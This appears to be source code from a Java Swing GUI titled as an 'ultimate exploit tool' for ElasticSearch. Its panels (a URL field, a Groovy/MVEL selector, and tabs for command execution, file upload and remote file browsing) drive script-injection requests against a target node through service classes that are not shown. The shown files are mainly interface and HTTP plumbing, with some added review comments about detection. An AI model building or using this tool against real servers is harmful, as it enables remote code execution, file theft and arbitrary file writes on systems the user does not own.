SwingUtilities.invokeLater(new Runnable(){ 213 | public void run() { 214 | tree.repaint(); 215 | tree.updateUI(); 216 | } 217 | }; 218 | 219 | } 220 | 221 | } 222 | }).start(); 223 | 224 | } 225 | } 226 | }); 227 | 228 | rightJPopupMenu.add(download); 229 | rightJPopupMenu.add(refresh); 230 | rightJPopupMenu.show(tree, e.getX(), e.getY()); 231 | } 232 | } 233 | 234 | }); 235 | 236 | JScrollPane fileContentJScrollPane=new JScrollPane(fileContentJTabbedPane); 237 | 238 | splitPane.setLeftComponent(fileJtreeJScrollPane); 239 | 240 | splitPane.setRightComponent(fileContentJScrollPane); 241 | 242 | GroupLayout groupLayout = new GroupLayout(this); 243 | groupLayout.setHorizontalGroup( 244 | groupLayout.createParallelGroup(Alignment.LEADING) 245 | .addComponent(splitPane, GroupLayout.DEFAULT_SIZE, 600, Short.MAX_VALUE) 246 | ); 247 | groupLayout.setVerticalGroup( 248 | groupLayout.createParallelGroup(Alignment.LEADING) 249 | .addComponent(splitPane, GroupLayout.DEFAULT_SIZE, 460, Short.MAX_VALUE) 250 | ); 251 | 252 | setLayout(groupLayout); 253 | } 254 | 255 | 256 | public void setReqestUrl(String host){ 257 | this.host=host; 258 | } 259 | 260 | public void setVersion(Version version){ 261 | this.version=version; 262 | } 263 | 264 | private void getRoots(){ 265 | try { 266 | root.removeAllChildren(); 267 | if (host!=null) { 268 | 269 | MyService service=null; 270 | 271 | if (version.equals(Version.Groovy)) { 272 | service=new ESGroovyServiceImpl(); 273 | }else { 274 | service=new ESMvelServiceImp(); 275 | } 276 | 277 | ListdiskList=service.listRoots(host); 278 | 279 | DefaultTreeModel defaultTreeModel = null; 280 | 281 | for (String disk:diskList) { 282 | DefaultMutableTreeNode child = new DefaultMutableTreeNode(disk); 283 | root.add(child); 284 | } 285 | defaultTreeModel = new DefaultTreeModel(this.root); 286 | tree.setModel(defaultTreeModel); 287 | tree.repaint(); 288 | 289 | }else { 290 | JOptionPane.showMessageDialog(this, "请输入URL"); 291 | } 292 | } catch (Exception 
exp) { 293 | exp.printStackTrace(); 294 | JOptionPane.showMessageDialog(this, "对不起,无法获取文件系统"); 295 | } 296 | } 297 | 298 | 299 | private List getFiles(String path){ 300 | 301 | try { 302 | if (host!=null) { 303 | 304 | MyService service=null; 305 | 306 | if (version.equals(Version.Groovy)) { 307 | service=new ESGroovyServiceImpl(); 308 | }else { 309 | service=new ESMvelServiceImp(); 310 | } 311 | 312 | ListfileList=service.getFiles(host, path); 313 | 314 | return fileList; 315 | 316 | }else { 317 | JOptionPane.showMessageDialog(this, "请输入URL"); 318 | return null; 319 | } 320 | } catch (Exception exp) { 321 | exp.printStackTrace(); 322 | JOptionPane.showMessageDialog(this, "对不起,无法获取文件系统"); 323 | return null; 324 | } 325 | } 326 | 327 | 328 | 329 | private boolean isDirectory(String path){ 330 | try { 331 | if (host!=null) { 332 | 333 | MyService service=null; 334 | 335 | if (version.equals(Version.Groovy)) { 336 | service=new ESGroovyServiceImpl(); 337 | }else { 338 | service=new ESMvelServiceImp(); 339 | } 340 | 341 | boolean flag=service.isDirectory(host, path); 342 | 343 | return flag; 344 | }else { 345 | JOptionPane.showMessageDialog(this, "请输入URL"); 346 | return false; 347 | } 348 | } catch (Exception exp) { 349 | exp.printStackTrace(); 350 | JOptionPane.showMessageDialog(this, "对不起,无法获取文件系统"); 351 | return false; 352 | } 353 | } 354 | 355 | private String getFileContent(String path){ 356 | try { 357 | if (host!=null) { 358 | 359 | MyService service=null; 360 | 361 | if (version.equals(Version.Groovy)) { 362 | service=new ESGroovyServiceImpl(); 363 | }else { 364 | service=new ESMvelServiceImp(); 365 | } 366 | 367 | return service.getFileContent(host, path); 368 | }else { 369 | JOptionPane.showMessageDialog(this, "请输入URL"); 370 | return ""; 371 | 372 | } 373 | } catch (Exception exp) { 374 | exp.printStackTrace(); 375 | return ""; 376 | } 377 | } 378 | } 379 | -------------------------------------------------------------------------------- 
/src/org/vti/ui/MainPanel.java:
--------------------------------------------------------------------------------
1 | package org.vti.ui;
2 |
3 | import java.awt.event.FocusAdapter;
4 | import java.awt.event.FocusEvent;
5 |
6 | import javax.swing.JFrame;
7 | import javax.swing.GroupLayout;
8 | import javax.swing.GroupLayout.Alignment;
9 | import javax.swing.JLabel;
10 | import javax.swing.JTextField;
11 | import javax.swing.LayoutStyle.ComponentPlacement;
12 | import javax.swing.JTabbedPane;
13 | import javax.swing.JComboBox;
14 |
15 | import org.vti.enumeration.Version;
16 |
     /**
      * Top-level Swing window: a URL text field, a Groovy/MVEL selector and three tabs
      * (CmdPanel, UploadPanel, FileViewPanel). The window itself sends no requests; it
      * only hands the entered URL and the selected Version to the three panels.
      */
17 | public class MainPanel extends JFrame{
18 |
19 |     private static final long serialVersionUID = 1L;
         // Target base URL entered by the user.
20 |     private JTextField urlJTextField;
         // Selector holding the names of the Version enum constants.
21 |     private JComboBox versionJcomboBox;
22 |
         /**
          * Builds the window, creates the three tab panels and registers the focus
          * listeners that copy the URL and version into them.
          */
23 |     public MainPanel(){
             // Title text translates to "ElasticSearch ultimate exploit tool".
24 |         setTitle("ElasticSearch 终极漏洞利用工具 Powered By VTI");
25 |         setSize(600,460);
26 |         setLocationRelativeTo(null);
27 |         setVisible(true);
28 |         setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
29 |
30 |         JLabel urlJLabel = new JLabel("URL");
31 |
             // Pre-filled with a loopback address on port 9200.
32 |         urlJTextField = new JTextField("http://127.0.0.1:9200/");
33 |         urlJTextField.setColumns(10);
34 |
35 |         String []versions=new String[]{Version.Groovy.toString(),Version.MVEL.toString()};
36 |
37 |         versionJcomboBox = new JComboBox(versions);
38 |
39 |         JTabbedPane tabbedPane = new JTabbedPane(JTabbedPane.TOP);
40 |
41 |         final CmdPanel cmdPanel= new CmdPanel();
42 |
43 |         final UploadPanel uploadPanel= new UploadPanel();
44 |
45 |         final FileViewPanel fileViewPanel= new FileViewPanel();
46 |
             // Tab captions: "命令执行" = command execution, "文件上传" = file upload,
             // "文件浏览" = file browsing.
47 |         tabbedPane.add("命令执行", cmdPanel);
48 |
49 |         tabbedPane.add("文件上传", uploadPanel);
50 |
51 |         tabbedPane.add("文件浏览", fileViewPanel);
52 |
             // The three listeners below have the same body: on focus loss of the URL
             // field, the selector or the frame, the trimmed URL and the selected Version
             // are pushed to all three panels. Within this class these callbacks are the
             // only place the panels are given a URL or version.
53 |         urlJTextField.addFocusListener(new FocusAdapter() {
54 |             @Override
55 |             public void focusLost(FocusEvent e) {
56 |                 super.focusLost(e);
57 |
58 |                 cmdPanel.setReqestUrl(urlJTextField.getText().trim());
59 |                 cmdPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString()));
60 |
61 |                 uploadPanel.setReqestUrl(urlJTextField.getText().trim());
62 |                 uploadPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString()));
63 |
64 |                 fileViewPanel.setReqestUrl(urlJTextField.getText().trim());
65 |                 fileViewPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString()));
66 |
67 |             }
68 |         });
69 |
70 |         versionJcomboBox.addFocusListener(new FocusAdapter() {
71 |             @Override
72 |             public void focusLost(FocusEvent e) {
73 |                 super.focusLost(e);
74 |
75 |                 cmdPanel.setReqestUrl(urlJTextField.getText().trim());
76 |                 cmdPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString()));
77 |
78 |                 uploadPanel.setReqestUrl(urlJTextField.getText().trim());
79 |                 uploadPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString()));
80 |
81 |                 fileViewPanel.setReqestUrl(urlJTextField.getText().trim());
82 |                 fileViewPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString()));
83 |             }
84 |         });
85 |
86 |         this.addFocusListener(new FocusAdapter() {
87 |             @Override
88 |             public void focusLost(FocusEvent e) {
89 |                 super.focusLost(e);
90 |
91 |                 cmdPanel.setReqestUrl(urlJTextField.getText().trim());
92 |                 cmdPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString()));
93 |
94 |                 uploadPanel.setReqestUrl(urlJTextField.getText().trim());
95 |                 uploadPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString()));
96 |
97 |                 fileViewPanel.setReqestUrl(urlJTextField.getText().trim());
98 |                 fileViewPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString()));
99 |             }
100 |         });
101 |
102 |
             // Layout: label, URL field and selector on one row, the tabbed pane below.
103 |         GroupLayout groupLayout = new GroupLayout(getContentPane());
104 |         groupLayout.setHorizontalGroup(
105 |             groupLayout.createParallelGroup(Alignment.LEADING)
106 |                 .addGroup(groupLayout.createSequentialGroup()
107 |                     .addContainerGap()
108 |                     .addComponent(urlJLabel)
109 |                     .addPreferredGap(ComponentPlacement.UNRELATED)
110 |                     .addComponent(urlJTextField, GroupLayout.DEFAULT_SIZE, 452, Short.MAX_VALUE)
111 |                     .addPreferredGap(ComponentPlacement.RELATED)
112 |                     .addComponent(versionJcomboBox, GroupLayout.PREFERRED_SIZE, 80, GroupLayout.PREFERRED_SIZE)
113 |                     .addGap(10))
114 |                 .addComponent(tabbedPane, GroupLayout.DEFAULT_SIZE, 584, Short.MAX_VALUE)
115 |         );
116 |         groupLayout.setVerticalGroup(
117 |             groupLayout.createParallelGroup(Alignment.LEADING)
118 |                 .addGroup(groupLayout.createSequentialGroup()
119 |                     .addContainerGap()
120 |                     .addGroup(groupLayout.createParallelGroup(Alignment.LEADING)
121 |                         .addGroup(groupLayout.createParallelGroup(Alignment.BASELINE)
122 |                             .addComponent(urlJLabel)
123 |                             .addComponent(urlJTextField, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
124 |                         .addComponent(versionJcomboBox, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
125 |                     .addPreferredGap(ComponentPlacement.RELATED)
126 |                     .addComponent(tabbedPane, GroupLayout.DEFAULT_SIZE, 385, Short.MAX_VALUE))
127 |         );
128 |         getContentPane().setLayout(groupLayout);
129 |
130 |     }
131 | }
132 |
--------------------------------------------------------------------------------
/src/org/vti/ui/UploadPanel.java:
--------------------------------------------------------------------------------
1 | package org.vti.ui;
2 |
3 | import java.awt.event.ActionEvent;
4 | import java.awt.event.ActionListener;
5 |
6 | import javax.swing.JButton;
7 | import javax.swing.JLabel;
8 | import javax.swing.JOptionPane;
9 | import javax.swing.JPanel;
10 | import javax.swing.GroupLayout;
11 | import javax.swing.JScrollPane;
12 | import javax.swing.JTextField;
13 | import javax.swing.JTextPane;
14 | import javax.swing.GroupLayout.Alignment;
15 | import javax.swing.LayoutStyle.ComponentPlacement;
16 |
17 | import org.vti.enumeration.Version;
18 | import org.vti.service.MyService;
19 | import org.vti.service.impl.ESGroovyServiceImpl;
20 | import org.vti.service.impl.ESMvelServiceImp;
21 |
22 |
23 | public
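/**
 * Swing tab that takes a destination path and a block of text and passes both to
 * {@link MyService#doUpload} for the host and script-engine {@link Version} that the
 * parent window pushes in through {@link #setReqestUrl} and {@link #setVersion}.
 *
 * <p>The path and the text are forwarded exactly as typed; nothing in this class validates
 * or escapes them.
 *
 * <p>NOTE(review): how {@code doUpload} delivers the content is not visible in this file.
 * Presumably it uses the same script-carrying search request that the service
 * implementations build for command execution. If so, a node with dynamic scripting
 * disabled should refuse it, and the request body should be recognisable in HTTP logs.
 * Confirm against the service classes.
 */
class UploadPanel extends JPanel implements ActionListener {

    private static final long serialVersionUID = 1L;

    private JTextField pathJTextField;
    private JButton uploadJButton;
    private JTextPane textPane;

    // Base URL of the node and the selected script engine; both are written by the
    // parent window and read on the event-dispatch thread.
    private String host;
    private Version version;

    /** Builds the path field, the upload button and the scrollable content editor. */
    public UploadPanel() {
        setSize(600, 460);

        JLabel cmdJLabel = new JLabel("PATH");

        pathJTextField = new JTextField("/tmp/file.txt");
        pathJTextField.setColumns(10);

        // Button caption reads "Upload".
        uploadJButton = new JButton("上传");
        uploadJButton.addActionListener(this);

        textPane = new JTextPane();

        JScrollPane scrollPane = new JScrollPane(textPane);

        GroupLayout groupLayout = new GroupLayout(this);
        groupLayout.setHorizontalGroup(
            groupLayout.createParallelGroup(Alignment.LEADING)
                .addGroup(groupLayout.createSequentialGroup()
                    .addContainerGap()
                    .addGroup(groupLayout.createParallelGroup(Alignment.LEADING)
                        .addComponent(scrollPane, Alignment.TRAILING, GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE)
                        .addGroup(groupLayout.createSequentialGroup()
                            .addComponent(cmdJLabel)
                            .addPreferredGap(ComponentPlacement.UNRELATED)
                            .addComponent(pathJTextField, GroupLayout.DEFAULT_SIZE, 470, Short.MAX_VALUE)
                            .addGap(20)
                            .addComponent(uploadJButton, GroupLayout.PREFERRED_SIZE, 60, GroupLayout.PREFERRED_SIZE)))
                    .addContainerGap())
        );
        groupLayout.setVerticalGroup(
            groupLayout.createParallelGroup(Alignment.LEADING)
                .addGroup(groupLayout.createSequentialGroup()
                    .addContainerGap()
                    .addGroup(groupLayout.createParallelGroup(Alignment.BASELINE)
                        .addComponent(cmdJLabel)
                        .addComponent(pathJTextField, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
                        .addComponent(uploadJButton))
                    .addGap(10)
                    .addComponent(scrollPane, GroupLayout.DEFAULT_SIZE, 410, Short.MAX_VALUE)
                    .addContainerGap())
        );
        setLayout(groupLayout);
        setVisible(true);
    }

    /**
     * Handles a click on the upload button.
     *
     * <p>Swing components may only be touched on the event-dispatch thread, so the form
     * values are snapshotted here and only the blocking service call moves to a worker.
     *
     * @param e the action event; events from any other source are ignored
     */
    @Override
    public void actionPerformed(ActionEvent e) {
        if (e.getSource() != uploadJButton) {
            return;
        }

        final String targetHost = host;
        final Version targetVersion = version;
        final String path = pathJTextField.getText().trim();
        final String content = textPane.getText();

        if (targetHost == null || path.length() == 0) {
            // Dialog text reads "Please enter a file path".
            JOptionPane.showMessageDialog(this, "请输入文件路径");
            return;
        }

        new Thread(new Runnable() {
            @Override
            public void run() {
                request(targetHost, targetVersion, path, content);
            }
        }).start();
    }

    /**
     * Runs the upload on the calling (worker) thread and reports the outcome.
     *
     * <p>Any exception, including an unset version, is printed and reported as a failed upload.
     *
     * @param targetHost base URL captured from the form
     * @param targetVersion script engine captured from the form; may be {@code null}
     * @param path destination path exactly as typed (trimmed)
     * @param content text to send exactly as typed
     */
    private void request(String targetHost, Version targetVersion, String path, String content) {
        boolean uploaded;
        try {
            if (targetVersion == null) {
                throw new IllegalStateException("version has not been set");
            }

            MyService service;
            if (targetVersion.equals(Version.Groovy)) {
                service = new ESGroovyServiceImpl();
            } else {
                service = new ESMvelServiceImp();
            }

            uploaded = service.doUpload(targetHost, path, content);
        } catch (Exception exp) {
            exp.printStackTrace();
            uploaded = false;
        }
        reportResult(uploaded);
    }

    /**
     * Shows the success or failure dialog on the event-dispatch thread.
     *
     * @param uploaded whether the service reported a successful upload
     */
    private void reportResult(final boolean uploaded) {
        javax.swing.SwingUtilities.invokeLater(new Runnable() {
            @Override
            public void run() {
                if (uploaded) {
                    // "Congratulations, upload succeeded!" under the title "Message".
                    JOptionPane.showMessageDialog(UploadPanel.this, "恭喜你,上传成功!", "消息", JOptionPane.INFORMATION_MESSAGE);
                } else {
                    // "Sorry, upload failed!" under the title "Message".
                    JOptionPane.showMessageDialog(UploadPanel.this, "对不起,上传失败!", "消息", JOptionPane.ERROR_MESSAGE);
                }
            }
        });
    }

    /**
     * Stores the base URL used for later uploads.
     *
     * @param host base URL as entered in the parent window
     */
    public void setReqestUrl(String host) {
        this.host = host;
    }

    /**
     * Stores the script engine that selects the service implementation.
     *
     * @param version engine chosen in the parent window
     */
    public void setVersion(Version version) {
        this.version = version;
    }
}
--------------------------------------------------------------------------------
/src/org/vti/util/RequestUtil.java:
--------------------------------------------------------------------------------
package org.vti.util;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

/**
 * Minimal blocking HTTP helper built on {@link HttpURLConnection}.
 *
 * <p>Both methods read the whole response into memory with no size limit and join its
 * lines without separators. A non-success status surfaces as the exception thrown by
 * {@link HttpURLConnection#getInputStream()}.
 */
public class RequestUtil {

    /** Connect and read timeout; the original set the read timeout twice and never the connect timeout. */
    private static final int TIMEOUT_MILLIS = 10 * 60 * 1000;

    /** Explicit charset so that payloads do not depend on the platform default encoding. */
    private static final String CHARSET = "UTF-8";

    /**
     * Issues a GET request and returns the response body.
     *
     * @param uri absolute URL to fetch
     * @return the response body with line terminators removed
     * @throws Exception if the URL is malformed or the request fails
     */
    public String doGetRequest(String uri) throws Exception {
        HttpURLConnection conn = (HttpURLConnection) new URL(uri).openConnection();

        conn.setConnectTimeout(TIMEOUT_MILLIS);
        conn.setReadTimeout(TIMEOUT_MILLIS);

        return readBody(conn);
    }

    /**
     * Issues a POST request with the given body and returns the response body.
     *
     * @param uri absolute URL to post to
     * @param pram request body, sent as UTF-8 bytes with no content type set
     * @return the response body with line terminators removed
     * @throws Exception if the URL is malformed or the request fails
     */
    public String doPostRequest(String uri, String pram) throws Exception {
        HttpURLConnection conn = (HttpURLConnection) new URL(uri).openConnection();

        conn.setRequestMethod("POST");
        conn.setConnectTimeout(TIMEOUT_MILLIS);
        conn.setReadTimeout(TIMEOUT_MILLIS);

        conn.setDoOutput(true);
        conn.setDoInput(true);

        java.io.OutputStream out = conn.getOutputStream();
        try {
            out.write(pram.getBytes(CHARSET));
            out.flush();
        } finally {
            out.close();
        }

        return readBody(conn);
    }

    /**
     * Reads the response line by line and closes the reader even when reading fails.
     *
     * @param conn connection whose request has been fully configured
     * @return the concatenated response lines
     * @throws Exception if the response cannot be opened or read
     */
    private String readBody(HttpURLConnection conn) throws Exception {
        BufferedReader reader = new BufferedReader(new InputStreamReader(conn.getInputStream(), CHARSET));
        try {
            StringBuilder body = new StringBuilder();
            String line;
            while ((line = reader.readLine()) != null) {
                body.append(line);
            }
            return body.toString();
        } finally {
            reader.close();
        }
    }

}
--------------------------------------------------------------------------------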